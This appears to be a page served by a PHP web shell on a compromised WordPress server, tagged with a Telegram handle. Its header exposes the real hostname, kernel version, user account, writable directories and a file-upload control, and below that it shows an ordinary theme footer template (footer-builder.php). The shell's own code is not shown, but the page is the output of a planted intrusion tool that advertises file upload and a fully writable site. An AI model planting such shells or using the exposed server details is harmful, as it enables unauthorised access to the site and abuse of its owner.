https://t.me/RX1948
Server : Apache
System : Linux server.lienzindia.com 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64
User : plutus ( 1007)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /home/plutus/public_html/wp-content/themes/vrm/partials/footer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/plutus/public_html/wp-content/themes/vrm/partials/footer/footer-builder.php
<?php

/**
 * Footer Builder Content
 *
 * @package TotalTheme
 * @subpackage Partials
 * @version 5.8.0
 *
 * @todo remove the entry classname from footer-builder-content?
 */

defined( 'ABSPATH' ) || exit;

$template_id = wpex_footer_builder_id();

if ( ! $template_id && empty( $_GET['wpex_inline_footer_template_editor'] ) ) {
	return;
}

?>

<footer id="footer-builder" class="footer-builder"<?php wpex_schema_markup( 'footer' ); ?>>
	<div class="footer-builder-content container entry wpex-clr">
		<?php
		if ( wpex_is_footer_builder_page() && ( wpex_vc_is_inline() || wpex_elementor_is_preview_mode() ) ) {
			while ( have_posts() ) : the_post();
				the_content();
			endwhile;
		} else {
			if ( 'elementor' === totaltheme_get_post_builder_type( $template_id ) ) {
				echo wpex_get_elementor_content_for_display( $template_id );
			} else {
				$content = get_post_field( 'post_content', $template_id );
				$content = wpex_sanitize_template_content( $content );
				echo apply_filters( 'wpex_footer_builder_content', $content );
			}
		} ?>
	</div>
</footer>

https://t.me/RX1948 - 2025